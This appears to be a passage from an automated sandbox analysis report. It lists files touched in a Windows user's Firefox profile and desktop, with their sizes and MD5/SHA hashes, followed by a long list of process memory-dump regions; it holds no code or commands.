                                                          • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\tdlob5bw.default-release\datareporting\glean\pending_pings\43811572-11a1-4204-ba4c-18afa1ba6318

                                                            Filesize

                                                            16KB

                                                            MD5

                                                            c960c9e743230858f0e8b197491b68fa

                                                            SHA1

                                                            74ed8c80a08c42a300545d8c7320562e51245548

                                                            SHA256

                                                            f9dfbf1db4143af30ba76a7aadfe350e9397895c2753b4574a8ae0677d582434

                                                            SHA512

                                                            7b7c49ba69f2c3362863fda7392330d490de82a111887263bd5e95136622fd97c483fc68f24aedfeca4f59d2ae2b5d76ec42bc25b248d060ac396933a19cdfc5

                                                          • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\tdlob5bw.default-release\datareporting\glean\pending_pings\579bfbc2-bf30-4919-bce6-5127d6b8b902

                                                            Filesize

                                                            235B

                                                            MD5

                                                            87ffb925247b6a1fdd0d93edc17bc569

                                                            SHA1

                                                            b640efeff2b95a60f6df25d4dc068588dc74cc6e

                                                            SHA256

                                                            65e093bf8eb1cdabaf6b37447aa2ac4b28a5824cf500abfbd3a2c9cda92f15e9

                                                            SHA512

                                                            07440bbe2e27a0c9e414de6d35d99b8bfac4606a64114f8fc9c9e44a9b0001ad711e0df76420d406efa6b42dc05a2965ef7d4008d3034891089b2035eb0bcce7

                                                          • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\tdlob5bw.default-release\datareporting\glean\pending_pings\641c6695-cb3c-4c7f-b2f7-2180a6f4d7a0

                                                            Filesize

                                                            2KB

                                                            MD5

                                                            05cbeeee8d4a85defa061334c9174fbd

                                                            SHA1

                                                            09815058afb924d2da4c14738dc2d0ddbacffe86

                                                            SHA256

                                                            5d9d16d8fb35182a1e6983559696b3818f42022bbc04e3c55290bfeea6a13f77

                                                            SHA512

                                                            3feb377d28f51102c6eb4c317e47e33be231d96a3431a0c1163dfa314c242151306783d007caecc6825098dd333c28591ae733b635a3b10a68bf76e8b6748c15

                                                          • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\tdlob5bw.default-release\datareporting\glean\pending_pings\79d66d53-66f9-4ddb-bc76-c9ce73a32750

                                                            Filesize

                                                            883B

                                                            MD5

                                                            117c41f430826e9f521ef6b3ae014315

                                                            SHA1

                                                            1e32305b05d282c62b8248b1caf57f950f95b1c8

                                                            SHA256

                                                            240d790e1b8297181d997991152dc71c14f5a584677dd3ea0f1a04a4ae060dce

                                                            SHA512

                                                            3f853bcd5cf95adeaf94b87002c4be1b96bae93f5a85c98d4282a5f32b1a0de1e4a387593d8c695594ca6e3a91615634aca308fd066f1eedb87ca1fc3e3aab0e

                                                          • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\tdlob5bw.default-release\datareporting\glean\pending_pings\7a364a3f-e6a8-4b6d-8261-001717d08519

                                                            Filesize

                                                            235B

                                                            MD5

                                                            7771fc76ccd965fa02cd8ac64038e075

                                                            SHA1

                                                            1cab6b210cb2a930461c3a0f2d78b75cce96598c

                                                            SHA256

                                                            34725aa24353c2eb17f168ff446d1a7b693a5628979924bb738b34c1921d31b6

                                                            SHA512

                                                            4fbf4676b40af58e3465b1be85b3ce8a0c7c3a86cb1276e0b508f854df50e59781fbf5197f14c6c4fb570e48bad22d0b1f8b8b9e3eaecd1887ef465a0fccf1ba

                                                          • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\tdlob5bw.default-release\extensions.json

                                                            Filesize

                                                            16KB

                                                            MD5

                                                            d0672a93f04efd4b3a1749d833124be2

                                                            SHA1

                                                            f1384cddb98c87c00515240aa10585e39693b999

                                                            SHA256

                                                            130217b768a418358c925fdeb1f64f36fb98e25dd67423b6b5b3ab1ee95ec28d

                                                            SHA512

                                                            4097a0edef0c63e1e33cc280c7105f575c00534cee1010f3e5da8783ff1fa885be8f4513ec350b80651aa9484a5c9bb99ce2d3c9007c6dc1aaa0eb15ca44dee0

                                                          • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\tdlob5bw.default-release\gmp-gmpopenh264\2.6.0\gmpopenh264.dll

                                                            Filesize

                                                            1.1MB

                                                            MD5

                                                            626073e8dcf656ac4130e3283c51cbba

                                                            SHA1

                                                            7e3197e5792e34a67bfef9727ce1dd7dc151284c

                                                            SHA256

                                                            37c005a7789747b412d6c0a6a4c30d15732da3d857b4f94b744be1a67231b651

                                                            SHA512

                                                            eebdeef5e47aeadfeebdbab8625f4ec91e15c4c4e4db4be91ea41be4a3da1e1afeed305f6470e5d6b2a31c41cbfb5548b35a15fccd7896d3fde7cdf402d7a339

                                                          • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\tdlob5bw.default-release\gmp-gmpopenh264\2.6.0\gmpopenh264.info

                                                            Filesize

                                                            116B

                                                            MD5

                                                            ae29912407dfadf0d683982d4fb57293

                                                            SHA1

                                                            0542053f5a6ce07dc206f69230109be4a5e25775

                                                            SHA256

                                                            fe7686a6281f0ab519c32c788ce0da0d01640425018dcffcfcb81105757f6fe6

                                                            SHA512

                                                            6f9083152c02f93a900cb69b1ce879e0c0d69453f1046280ca549a0301ae7925facdda6329f7ccb61726addee78ba2fffc5ba3491a185f139f3155716caf0a8d

                                                          • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\tdlob5bw.default-release\gmp-widevinecdm\4.10.2891.0\manifest.json

                                                            Filesize

                                                            1001B

                                                            MD5

                                                            32aeacedce82bafbcba8d1ade9e88d5a

                                                            SHA1

                                                            a9b4858d2ae0b6595705634fd024f7e076426a24

                                                            SHA256

                                                            4ed3c6389f6f7cd94db5cd0f870c34a296fc0de3b1e707fccf01645b455790ce

                                                            SHA512

                                                            67dfe5632188714ec87f3c79dbe217a0ae4dfb784f3fac63affd20fef8b8ef1978c28b3bf7955f3daaf3004ac5316b1ffa964683b0676841bab4274c325c6e2b

                                                          • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\tdlob5bw.default-release\gmp-widevinecdm\4.10.2891.0\widevinecdm.dll

                                                            Filesize

                                                            18.5MB

                                                            MD5

                                                            1b32d1ec35a7ead1671efc0782b7edf0

                                                            SHA1

                                                            8e3274b9f2938ff2252ed74779dd6322c601a0c8

                                                            SHA256

                                                            3ed0dec36754402707c2ae4fbfa887fe3089945f6f7c1a8a3e6c1e64ad1c2648

                                                            SHA512

                                                            ab452caa2a529b5bf3874c291f1ffb2a30d9ea43dae5df6a6995dde4bc3506648c749317f0d8e94c31214e62f18f855d933b6d0b6b44634b01e058d3c5fcb499

                                                          • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\tdlob5bw.default-release\prefs-1.js

                                                            Filesize

                                                            8KB

                                                            MD5

                                                            281dad8de6c7e7ca375b3a4abcc147c3

                                                            SHA1

                                                            38da072fd4b7065ed55bf35dacd580d476422a55

                                                            SHA256

                                                            45410f0693b923a115c099a330d0ecea16abe8560402a59e808a4b08f2433ecd

                                                            SHA512

                                                            c7d4488e6dd296c354ebdca0adb9662fd2f2c89ff6875adb9bdd875e94f148cf1cf32fd847cc0e484de78866058e78d1747fcfef7d61ce1f0d82be1dbc0a1816

                                                          • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\tdlob5bw.default-release\prefs-1.js

                                                            Filesize

                                                            6KB

                                                            MD5

                                                            b1e09e0be801d9a8ecfbadd6f5ea5506

                                                            SHA1

                                                            33849d06419b360613f0532692857f739d2374f4

                                                            SHA256

                                                            d05963af5c1a8d21edb90639382d5cbbf90e44e2195854d8a4f53d28c6093510

                                                            SHA512

                                                            1854b8b2404e6650693e0dc42e80364f30f4ca65945ea2d4bf2efd1b28075590dbe030797f0ef25c5f0cdf76b3fa5b83332c5f7f39a7e7ed1a9fa4abdeb02a91

                                                          • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\tdlob5bw.default-release\prefs.js

                                                            Filesize

                                                            6KB

                                                            MD5

                                                            da87700ca6d5731ff19fded1cd7733d3

                                                            SHA1

                                                            016982e9b88bc23615a5d707a86f2a150913878d

                                                            SHA256

                                                            e387a2f63807c74b04c6abd7fcd8637b55f3c1244cb86f700d65b0b86ec3c300

                                                            SHA512

                                                            2bd391adc9099dc144b45a86058041caa16618880704d2369543afbc26401275aae272f96b4505dd7cef82b19da6f8eb6d0a8f6cc166bc156cc202ea578aa869

                                                          • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\tdlob5bw.default-release\sessionstore-backups\recovery.baklz4

                                                            Filesize

                                                            1KB

                                                            MD5

                                                            721494f118861133aaccae8dfa0a4a6b

                                                            SHA1

                                                            ef87ed35f92477d44a9b9ccae7f9d8e2bc9c7161

                                                            SHA256

                                                            3d5b0a29fbdcce39fba3832244f562da74da3ec82e23ae19b48d625e1003fe6c

                                                            SHA512

                                                            0ce38d3934ac21d9d068ce67149153af9c972b9117da825b4f571196d82deeeac3f3b4f416e25296bba5c8033491ac0b4b87094c97ec0b20b8e1453785119f60

                                                          • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\tdlob5bw.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite

                                                            Filesize

                                                            3.4MB

                                                            MD5

                                                            a6df5eb0e35484289595c504f537c49f

                                                            SHA1

                                                            6dfe075bdde2611fab22761902b18e3d93b435f5

                                                            SHA256

                                                            75dd9b0b590adc5191c3ea754277449e34d53b4bc22835ede7c06b7ba2bf184f

                                                            SHA512

                                                            127832daea0e89bdec0a803c9c3ac3392d83a6c25ec82ea793723f28ebc98ede2cf6ad957c67816b5f0c9ad29733fba15f17132dc72dff72b3b689cb6708de14

                                                          • C:\Users\Admin\Desktop\YCL.lnk

                                                            Filesize

                                                            2KB

                                                            MD5

                                                            85f1c41ba1ddd15760b2762a4ec4a755

                                                            SHA1

                                                            589e74240cfbb46ee6d711db6a0ff0d0b875fb2b

                                                            SHA256

                                                            f1039942c6ac54bd8e53bd311fb2783d6b9b2df60e426b3adf1033054067ff3d

                                                            SHA512

                                                            a61ce7c8f0ef7714bc5513c0e4afe533fe3260c1837f384f9de0e0078438cad995b060cb06b9e883d4b366b59f46bbee6d7763ab7a820823b0fe643d4e08f84e

                                                          • memory/1376-32-0x0000000000800000-0x0000000000CD6000-memory.dmp

                                                            Filesize

                                                            4.8MB

                                                          • memory/1376-47-0x0000000000800000-0x0000000000CD6000-memory.dmp

                                                            Filesize

                                                            4.8MB

                                                          • memory/1380-767-0x0000000000130000-0x0000000000606000-memory.dmp

                                                            Filesize

                                                            4.8MB

                                                          • memory/1796-214-0x0000000000400000-0x000000000042E000-memory.dmp

                                                            Filesize

                                                            184KB

                                                          • memory/1796-208-0x0000000010000000-0x000000001001C000-memory.dmp

                                                            Filesize

                                                            112KB

                                                          • memory/1796-646-0x0000000000400000-0x000000000042E000-memory.dmp

                                                            Filesize

                                                            184KB

                                                          • memory/1796-202-0x0000000000400000-0x000000000042E000-memory.dmp

                                                            Filesize

                                                            184KB

                                                          • memory/1796-198-0x0000000000400000-0x000000000042E000-memory.dmp

                                                            Filesize

                                                            184KB

                                                          • memory/1796-194-0x0000000000400000-0x000000000042E000-memory.dmp

                                                            Filesize

                                                            184KB

                                                          • memory/1796-317-0x0000000000400000-0x000000000042E000-memory.dmp

                                                            Filesize

                                                            184KB

                                                          • memory/2176-1153-0x000001FA46840000-0x000001FA46862000-memory.dmp

                                                            Filesize

                                                            136KB

                                                          • memory/2684-283-0x00007FF66DFF0000-0x00007FF66E67C000-memory.dmp

                                                            Filesize

                                                            6.5MB

                                                          • memory/2684-285-0x00007FF66DFF0000-0x00007FF66E67C000-memory.dmp

                                                            Filesize

                                                            6.5MB

                                                          • memory/2736-196-0x0000000000400000-0x0000000000E14000-memory.dmp

                                                            Filesize

                                                            10.1MB

                                                          • memory/2736-191-0x0000000000400000-0x0000000000E14000-memory.dmp

                                                            Filesize

                                                            10.1MB

                                                          • memory/3068-723-0x0000000000130000-0x0000000000606000-memory.dmp

                                                            Filesize

                                                            4.8MB

                                                          • memory/3068-1163-0x0000000000130000-0x0000000000606000-memory.dmp

                                                            Filesize

                                                            4.8MB

                                                          • memory/3068-173-0x0000000000130000-0x0000000000606000-memory.dmp

                                                            Filesize

                                                            4.8MB

                                                          • memory/3068-764-0x0000000000130000-0x0000000000606000-memory.dmp

                                                            Filesize

                                                            4.8MB

                                                          • memory/3068-243-0x0000000000130000-0x0000000000606000-memory.dmp

                                                            Filesize

                                                            4.8MB

                                                          • memory/3068-48-0x0000000000130000-0x0000000000606000-memory.dmp

                                                            Filesize

                                                            4.8MB

                                                          • memory/3068-896-0x0000000000130000-0x0000000000606000-memory.dmp

                                                            Filesize

                                                            4.8MB

                                                          • memory/3068-80-0x0000000000130000-0x0000000000606000-memory.dmp

                                                            Filesize

                                                            4.8MB

                                                          • memory/3068-79-0x0000000000130000-0x0000000000606000-memory.dmp

                                                            Filesize

                                                            4.8MB

                                                          • memory/3068-215-0x0000000000130000-0x0000000000606000-memory.dmp

                                                            Filesize

                                                            4.8MB

                                                          • memory/3068-275-0x0000000000130000-0x0000000000606000-memory.dmp

                                                            Filesize

                                                            4.8MB

                                                          • memory/3068-95-0x0000000000130000-0x0000000000606000-memory.dmp

                                                            Filesize

                                                            4.8MB

                                                          • memory/3068-201-0x0000000000130000-0x0000000000606000-memory.dmp

                                                            Filesize

                                                            4.8MB

                                                          • memory/3068-199-0x0000000000130000-0x0000000000606000-memory.dmp

                                                            Filesize

                                                            4.8MB

                                                          • memory/3068-1114-0x0000000000130000-0x0000000000606000-memory.dmp

                                                            Filesize

                                                            4.8MB

                                                          • memory/3068-328-0x0000000000130000-0x0000000000606000-memory.dmp

                                                            Filesize

                                                            4.8MB

                                                          • memory/3284-172-0x00000000000E0000-0x000000000059A000-memory.dmp

                                                            Filesize

                                                            4.7MB

                                                          • memory/3284-170-0x00000000000E0000-0x000000000059A000-memory.dmp

                                                            Filesize

                                                            4.7MB

                                                          • memory/3448-204-0x0000000000130000-0x0000000000606000-memory.dmp

                                                            Filesize

                                                            4.8MB

                                                          • memory/3448-205-0x0000000000130000-0x0000000000606000-memory.dmp

                                                            Filesize

                                                            4.8MB

                                                          • memory/3584-259-0x0000000000E80000-0x000000000132E000-memory.dmp

                                                            Filesize

                                                            4.7MB

                                                          • memory/3584-263-0x0000000000E80000-0x000000000132E000-memory.dmp

                                                            Filesize

                                                            4.7MB

                                                          • memory/4344-115-0x00000000055C0000-0x0000000005782000-memory.dmp

                                                            Filesize

                                                            1.8MB

                                                          • memory/4344-117-0x0000000007140000-0x00000000071D2000-memory.dmp

                                                            Filesize

                                                            584KB

                                                          • memory/4344-113-0x0000000000BC0000-0x0000000000BFC000-memory.dmp

                                                            Filesize

                                                            240KB

                                                          • memory/4344-114-0x00000000053D0000-0x00000000053E2000-memory.dmp

                                                            Filesize

                                                            72KB

                                                          • memory/4344-116-0x0000000006510000-0x0000000006A3C000-memory.dmp

                                                            Filesize

                                                            5.2MB

                                                          • memory/4624-23-0x0000000006F90000-0x0000000006FB2000-memory.dmp

                                                            Filesize

                                                            136KB

                                                          • memory/4624-24-0x0000000007DD0000-0x0000000008374000-memory.dmp

                                                            Filesize

                                                            5.6MB

                                                          • memory/4624-2-0x0000000002490000-0x00000000024C6000-memory.dmp

                                                            Filesize

                                                            216KB

                                                          • memory/4624-3-0x0000000004BA0000-0x00000000051C8000-memory.dmp

                                                            Filesize

                                                            6.2MB

                                                          • memory/4624-4-0x0000000005200000-0x0000000005222000-memory.dmp

                                                            Filesize

                                                            136KB

                                                          • memory/4624-6-0x0000000005440000-0x00000000054A6000-memory.dmp

                                                            Filesize

                                                            408KB

                                                          • memory/4624-5-0x00000000052A0000-0x0000000005306000-memory.dmp

                                                            Filesize

                                                            408KB

                                                          • memory/4624-16-0x0000000005600000-0x0000000005954000-memory.dmp

                                                            Filesize

                                                            3.3MB

                                                          • memory/4624-17-0x0000000005A90000-0x0000000005AAE000-memory.dmp

                                                            Filesize

                                                            120KB

                                                          • memory/4624-18-0x0000000005AB0000-0x0000000005AFC000-memory.dmp

                                                            Filesize

                                                            304KB

                                                          • memory/4624-19-0x00000000071A0000-0x000000000781A000-memory.dmp

                                                            Filesize

                                                            6.5MB

                                                          • memory/4624-20-0x0000000005FA0000-0x0000000005FBA000-memory.dmp

                                                            Filesize

                                                            104KB

                                                          • memory/4624-22-0x0000000007000000-0x0000000007096000-memory.dmp

                                                            Filesize

                                                            600KB

                                                          • memory/4776-241-0x0000000000400000-0x000000000042E000-memory.dmp

                                                            Filesize

                                                            184KB

                                                          • memory/4776-238-0x0000000000400000-0x000000000042E000-memory.dmp

                                                            Filesize

                                                            184KB

                                                          • memory/4776-958-0x0000000000400000-0x000000000042E000-memory.dmp

                                                            Filesize

                                                            184KB

                                                          • memory/4776-280-0x0000000000400000-0x000000000042E000-memory.dmp

                                                            Filesize

                                                            184KB

                                                          • memory/4776-897-0x0000000000400000-0x000000000042E000-memory.dmp

                                                            Filesize

                                                            184KB

                                                          • memory/4776-329-0x0000000000400000-0x000000000042E000-memory.dmp

                                                            Filesize

                                                            184KB

                                                          • memory/4896-1137-0x0000000000560000-0x0000000000562000-memory.dmp

                                                            Filesize

                                                            8KB

                                                          • memory/4896-1138-0x000002727EC80000-0x000002727ECF1000-memory.dmp

                                                            Filesize

                                                            452KB

                                                          • memory/4896-1146-0x000002727EC80000-0x000002727ECF1000-memory.dmp

                                                            Filesize

                                                            452KB

                                                          • memory/4896-1147-0x000002727EC80000-0x000002727ECF1000-memory.dmp

                                                            Filesize

                                                            452KB

                                                          • memory/4896-1145-0x000002727EC80000-0x000002727ECF1000-memory.dmp

                                                            Filesize

                                                            452KB

                                                          • memory/4900-242-0x0000000000400000-0x0000000000CCF000-memory.dmp

                                                            Filesize

                                                            8.8MB

                                                          • memory/4900-236-0x0000000000400000-0x0000000000CCF000-memory.dmp

                                                            Filesize

                                                            8.8MB

                                                          • memory/5148-1134-0x0000000000400000-0x0000000000682000-memory.dmp

                                                            Filesize

                                                            2.5MB

                                                          • memory/5236-782-0x0000000000400000-0x0000000000464000-memory.dmp

                                                            Filesize

                                                            400KB

                                                          • memory/5236-783-0x0000000000400000-0x0000000000464000-memory.dmp

                                                            Filesize

                                                            400KB

                                                          • memory/5740-1175-0x0000000000780000-0x0000000000908000-memory.dmp

                                                            Filesize

                                                            1.5MB

                                                          • memory/5996-761-0x0000000000450000-0x0000000000884000-memory.dmp

                                                            Filesize

                                                            4.2MB

                                                          • memory/5996-786-0x0000000000450000-0x0000000000884000-memory.dmp

                                                            Filesize

                                                            4.2MB

                                                          • memory/5996-808-0x0000000000450000-0x0000000000884000-memory.dmp

                                                            Filesize

                                                            4.2MB

                                                          • memory/5996-762-0x0000000000450000-0x0000000000884000-memory.dmp

                                                            Filesize

                                                            4.2MB

                                                          • memory/5996-763-0x0000000000450000-0x0000000000884000-memory.dmp

                                                            Filesize

                                                            4.2MB